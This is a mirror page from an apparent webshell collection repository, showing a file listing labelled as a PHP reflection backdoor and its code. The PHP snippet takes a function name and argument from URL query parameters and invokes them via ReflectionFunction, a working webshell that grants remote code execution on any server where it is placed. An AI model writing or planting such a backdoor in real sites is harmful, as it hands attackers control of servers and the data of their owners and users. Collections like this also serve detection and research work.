mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
.. | ||
11.jpg | ||
PHP reflection.php.txt | ||
PHP反射后门.php.txt | ||
Readme.md |
code:
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>